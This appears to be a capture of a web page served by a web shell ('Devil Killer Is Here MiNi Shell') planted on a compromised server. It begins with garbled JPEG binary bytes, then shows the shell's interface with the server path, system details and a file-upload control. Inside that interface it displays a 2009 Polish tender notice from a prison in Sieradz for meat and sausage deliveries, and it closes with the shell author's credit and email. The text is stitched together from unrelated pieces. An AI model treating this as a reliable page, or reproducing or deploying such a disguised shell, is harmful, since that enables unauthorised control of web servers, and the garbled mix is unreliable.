JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090803/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090803/125961-N-2009.html

<p class="kh_header"><b>Sieradz: Dostawy mięsa, produktów wędliniarskich i wędlin</b><br>
<b>Numer ogłoszenia: 125961 - 2009; data zamieszczenia: 03.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny , ul. Orzechowa 5, 98-200 Sieradz, woj. łódzkie, tel. 043 8270600, faks 043 8270621.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> zk_sieradz@sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: zakład karny.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy mięsa, produktów wędliniarskich i wędlin.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są dostawy do Zakładu Karnego w Sieradzu następujących rodzajów mięsa, produktów wędliniarskich i wędlin:

Część 1 - Mięso drobiowe, produkty wędliniarskie i wędliny drobiowe
1)Kanapkowa drobiowa, PN-A-86526, CPV 15131135-0					1200 kg
2)Mielonka drobiowa, PN-A-86526, CPV 15131135-0					1200 kg
3)Baton szynkowy drobiowy, PN-A-86526, CPV 15131135-0				1200 kg
4)Szynka tyrolska drobiowa, PN-A-86526, CPV 15131135-0					1200 kg
5)Polędwica drobiowa, PN-A-86526, CPV 15131135-0					1200 kg
6)Kiełbasa cienka drobiowa, PN-A-86526, CPV 15131135-0					1200 kg
7)Kotlet drobiowy, PN-A-86526, CPV 15131500-0						8000 kg
8)Mozaikowa drobiowa, PN-A-86526, CPV 15131135-0					1200 kg
9)Szynkowa drobiowa, PN-A-86526, CPV CPV 15131135-0					1200 kg
10)Parówki paluszki drobiowe, PN-A-86526, CPV 15131500-0				1200 kg
11)Pieczeń drobiowa, PN-A-86526, CPV 15131500-0						  400 kg
12)Pasztet drobiowy, PN-A-86526, CPV 15131500-0						  400 kg
13)Pałeczka z kurczaka, PN-A-86524, CPV 15112100-7					  400 kg
14)Noga z kurczaka, PN-A-86524, CPV 15112100-7						1200 kg
15)Skrzydło z kurczaka, PN-A-86524, CPV 15112100-7					1200 kg
16)Udzik z kurczaka, PN-A-86524, CPV 15112100-						1200 kg


	Część 2 - Mięso wieprzowe, wołowe, produkty wędliniarskie i wędliny wieprzowo-wołowe
1)Podgardle wędzone, PN-A-82007, CPV 15131200-7						1200 kg
2)Kiełbasa toruńska, PN-A-82007, CPV 15131130-5						2500 kg
3)Mortadela, PN-A-82007, CPV 15131130-5							2000 kg
4)Parówki paluszki, PN-A-82007, CPV 15131100-6						2000 kg
5)Parówki śląskie, PN-A-82007, CPV 15131100-6						2000 kg
6)Kiełbasa parówkowa, PN-A-82007, CPV 15131100-6						2000 kg
7)Kiełbasa biała parzona, PN-A-82007, CPV 15131120-2					2500 kg
8)Kiełbasa mielona, PN-A-82007, CPV 15131130-5						2500 kg
9)Kiełbasa śląska, PN-A-82007, CPV 15131130-5						2500 kg
10)Kiełbasa zwyczajna, PN-A-82007, CPV 15131130-5						3000 kg
11)Kiszka kaszana jęczmienna, PN-A-82007, CPV 15131134-3					2000 kg
12)Kiszka wątrobiana, PN-A-82007, CPV 15131134-3						2000 kg
13)Pasztet pieczony - foremka (300g - 500g), PN-A-82007, CPV 15131134-3			1500 kg
14)Kiełbasa podwawelska, PN-A-82007, CPV 15131130-5					2500 kg
15)Kiełbasa krakowska gruba, PN-A-82007, CPV 15131130-5					1800 kg
16)Kiełbasa szynkowa gruba, PN-A-82007, CPV 15131130-5					1800 kg
17)Salceson ozorkowy krwisty, PN-A-82007, CPV 15131134-3					2000 kg
18)Salceson włoski, PN-A-82007, CPV 15131100-6						2000 kg
19)Kiełbasa jałowcowa, PN-A-82007, CPV 15131130-5						2000 kg
20)Frankfurterki, PN-A-82007, CPV 15131130-5							  200 kg
21)Wątroba wieprzowa, PN-86/A-82004, CPV 15114000-0					1200 kg
22)Mięso gulaszowe wieprzowe, PN-A/82009, CPV15113000-3					5500 kg
23)Mięso gulaszowe wołowe, PN-91/A-82002, CPV 15111000-9					6500 kg

Zamawiający dopuszcza rozwiązania równoważne opisanym..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5, 15.13.11.35-0, 15.11.21.00-7, 15.13.15.00-0, 15.13.12.00-7, 15.13.11.00-6, 15.13.11.20-2, 15.13.11.34-3, 15.11.40.00-0, 15.11.10.00-3, 15.11.10.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą się ubiegać wykonawcy, którzy:
	Część 1 -  mięso drobiowe, produkty wędliniarskie i wędliny drobiowe
O udzielenie zamówienia mogą się ubiegać wykonawcy, którzy:

1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli	ustawy nakładają obowiązek posiadania takich uprawnień.

Zamawiający uzna warunek za spełniony, jeżeli wykonawca potwierdzi spełnienie warunku składając oświadczenie o spełnieniu wymagań, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych oraz aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami	zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów
	do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.

Zamawiający uzna warunek za spełniony, jeżeli wykonawca potwierdzi spełnienie warunku składając oświadczenie o spełnieniu wymagań, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych.

3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.

Zamawiający uzna warunek za spełniony, jeżeli wykonawca potwierdzi spełnienie warunku składając oświadczenie o spełnieniu wymagań, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych.
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
Zamawiający uzna warunek za spełniony, jeżeli wykonawca potwierdzi spełnienie warunku składając oświadczenie o spełnieniu wymagań, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych oraz potwierdzi dodatkowo składając aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Ponadto każdy wykonawca ma załączyć do oferty aktualną informację
z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy Prawo zamówień publicznych, a w przypadku podmiotów zbiorowych w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy Prawo zamówień publicznych, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast ww. dokumentów składa dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
nie otwarto jego likwidacji ani nie ogłoszono upadłości (wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert),
nie zalega z uiszczaniem podatków, opłat składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu (wystawiony nie wcześniej niż 3 miesięcy przed upływem terminu składania ofert),
w przypadku podmiotu zbiorowego nie orzeczono wobec niego zakazu ubiegania się o zamówienie (wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert).
	Ponadto składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju	pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 	1 pkt 4-8 ustawy Prawo zamówień publicznych, wystawione nie wcześniej niż 6 miesięcy przed	upływem terminu składania ofert.
	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce 	zamieszkania, nie wydaje się dokumentów, o których mowa wyżej, zastępuje się je dokumentem 	zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, 	administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju	pochodzenia osoby lub kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub	miejsce zamieszkania. Termin ważności oświadczenia jest taki sam jak termin ważności dokumentu,	który zastępuje.

Ocena spełnienia w/w warunków zostanie dokonana zgodnie z formułą spełnia - nie spełnia, na podstawie złożonych przez wykonawcę dokumentów.

	Część 2 -  mięso wieprzowe, wołowe, produkty wędliniarskie i wędliny wieprzowo-wołowe
O udzielenie zamówienia mogą się ubiegać wykonawcy, którzy:

1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.

Zamawiający uzna warunek za spełniony, jeżeli wykonawca potwierdzi spełnienie warunku składając oświadczenie o spełnieniu wymagań, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych oraz aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami 	zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów
	do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.

Zamawiający uzna warunek za spełniony, jeżeli wykonawca potwierdzi spełnienie warunku składając oświadczenie o spełnieniu wymagań, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych.

3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.

Zamawiający uzna warunek za spełniony, jeżeli wykonawca potwierdzi spełnienie warunku składając oświadczenie o spełnieniu wymagań, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych.

4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
Zamawiający uzna warunek za spełniony, jeżeli wykonawca potwierdzi spełnienie warunku składając oświadczenie o spełnieniu wymagań, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych oraz potwierdzi dodatkowo spełnienie warunku składając aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Ponadto każdy wykonawca ma załączyć do oferty aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy Prawo zamówień publicznych, a w przypadku podmiotów zbiorowych
w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy Prawo zamówień publicznych, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast ww. dokumentów składa dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
nie otwarto jego likwidacji ani nie ogłoszono upadłości (wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert),
nie zalega z uiszczaniem podatków, opłat składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu (wystawiony nie wcześniej niż 3 miesięcy przed upływem terminu składania ofert),
w przypadku podmiotu zbiorowego nie orzeczono wobec niego zakazu ubiegania się o zamówienie (wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert).
	Ponadto składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju	pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24
	ust. 1 pkt 4-8 ustawy Prawo zamówień publicznych, wystawione nie wcześniej niż 6 miesięcy przed	upływem terminu składania ofert.
	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce	zamieszkania, nie wydaje się dokumentów, o których mowa wyżej, zastępuje się je dokumentem	zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym,	administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju	pochodzenia osoby lub kraju pochodzenia osoby lub kraju, w którym	wykonawca ma siedzibę lub	miejsce zamieszkania. Termin ważności oświadczenia jest taki sam jak termin ważności dokumentu,	który zastępuje.

Ocena spełnienia w/w warunków zostanie dokonana zgodnie z formułą spełnia - nie spełnia,
na podstawie złożonych przez wykonawcę dokumentów.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1)	oświadczenie o spełnieniu warunków, o których mowa w art. 22 ust. 1 ustawy Prawo	zamówień publicznych, stanowiące Załącznik nr 3 do niniejszej Specyfikacji (w przypadku	wykonawców wspólnie ubiegających się o udzielenie zamówienia, w tym w przypadku	spółki cywilnej, składa każdy wykonawca, biorąc pod uwagę łączny potencjał techniczny
	i kadrowy, łączną wiedzę i doświadczenie oraz sytuację ekonomiczną i finansową	konsorcjum i własne uprawnienia oraz prawo do udziału w postępowaniu);
2)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji	działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub	zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy 	przed upływem terminu składania ofert (w przypadku wykonawców wspólnie ubiegających	się o udzielenie zamówienia, w tym w przypadku spółki cywilnej, składa każdy	wykonawca);
3)	aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego	oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia	Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem	podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub	zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie
	na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego	organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert	(w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, w tym
	w przypadku spółki cywilnej, składa każdy wykonawca);
4)	aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1	pkt 4-8 ustawy Prawo zamówień publicznych, a w przypadku podmiotów zbiorowych
	w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy Prawo zamówień publicznych,	wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny w Sieradzy, ul. Orzechowa 5, 98-200 Sieradz.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.08.2009 godzina 09:30, miejsce: Zakład Karny w Sieradzy, ul. Orzechowa 5, 98-200 Sieradz.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Mięso drobiowe, produkty wędliniarskie i wędliny drobiowe.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 1 - Mięso drobiowe, produkty wędliniarskie i wędliny drobiowe
1)Kanapkowa drobiowa, PN-A-86526, CPV 15131135-0					1200 kg
2)Mielonka drobiowa, PN-A-86526, CPV 15131135-0					1200 kg
3)Baton szynkowy drobiowy, PN-A-86526, CPV 15131135-0				1200 kg
4)Szynka tyrolska drobiowa, PN-A-86526, CPV 15131135-0					1200 kg
5)Polędwica drobiowa, PN-A-86526, CPV 15131135-0					1200 kg
6)Kiełbasa cienka drobiowa, PN-A-86526, CPV 15131135-0					1200 kg
7)Kotlet drobiowy, PN-A-86526, CPV 15131500-0						8000 kg
8)Mozaikowa drobiowa, PN-A-86526, CPV 15131135-0					1200 kg
9)Szynkowa drobiowa, PN-A-86526, CPV CPV 15131135-0					1200 kg
10)Parówki paluszki drobiowe, PN-A-86526, CPV 15131500-0				1200 kg
11)Pieczeń drobiowa, PN-A-86526, CPV 15131500-0						  400 kg
12)Pasztet drobiowy, PN-A-86526, CPV 15131500-0						  400 kg
13)Pałeczka z kurczaka, PN-A-86524, CPV 15112100-7					  400 kg
14)Noga z kurczaka, PN-A-86524, CPV 15112100-7						1200 kg
15)Skrzydło z kurczaka, PN-A-86524, CPV 15112100-7					1200 kg
16)Udzik z kurczaka, PN-A-86524, CPV 15112100-7						1200 kg.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.35-0, 15.13.15.00-0, 15.11.21.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Mięso wieprzowe, wołowe, produkty wędliniarskie i wędliny wieprzowo-wołowe.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 2 - Mięso wieprzowe, wołowe, produkty wędliniarskie i wędliny wieprzowo-wołowe
1)Podgardle wędzone, PN-A-82007, CPV 15131200-7						1200 kg
2)Kiełbasa toruńska, PN-A-82007, CPV 15131130-5						2500 kg
3)Mortadela, PN-A-82007, CPV 15131130-5							2000 kg
4)Parówki paluszki, PN-A-82007, CPV 15131100-6						2000 kg
5)Parówki śląskie, PN-A-82007, CPV 15131100-6						2000 kg
6)Kiełbasa parówkowa, PN-A-82007, CPV 15131100-6						2000 kg
7)Kiełbasa biała parzona, PN-A-82007, CPV 15131120-2					2500 kg
8)Kiełbasa mielona, PN-A-82007, CPV 15131130-5						2500 kg
9)Kiełbasa śląska, PN-A-82007, CPV 15131130-5						2500 kg
10)Kiełbasa zwyczajna, PN-A-82007, CPV 15131130-5						3000 kg
11)Kiszka kaszana jęczmienna, PN-A-82007, CPV 15131134-3					2000 kg
12)Kiszka wątrobiana, PN-A-82007, CPV 15131134-3						2000 kg
13)Pasztet pieczony - foremka (300g - 500g), PN-A-82007, CPV 15131134-3			1500 kg
14)Kiełbasa podwawelska, PN-A-82007, CPV 15131130-5					2500 kg
15)Kiełbasa krakowska gruba, PN-A-82007, CPV 15131130-5					1800 kg
16)Kiełbasa szynkowa gruba, PN-A-82007, CPV 15131130-5					1800 kg
17)Salceson ozorkowy krwisty, PN-A-82007, CPV 15131134-3					2000 kg
18)Salceson włoski, PN-A-82007, CPV 15131100-6						2000 kg
19)Kiełbasa jałowcowa, PN-A-82007, CPV 15131130-5						2000 kg
20)Frankfurterki, PN-A-82007, CPV 15131130-5							  200 kg
21)Wątroba wieprzowa, PN-86/A-82004, CPV 15114000-0					1200 kg
22)Mięso gulaszowe wieprzowe, PN-A/82009, CPV15113000-3					5500 kg
23)Mięso gulaszowe wołowe, PN-91/A-82002, CPV 15111000-9					6500 kg.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5, 15.13.12.00-7, 15.13.11.00-6, 15.13.11.20-2, 15.13.11.34-3, 15.11.40.00-0, 15.11.30.00-3, 15.11.10.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com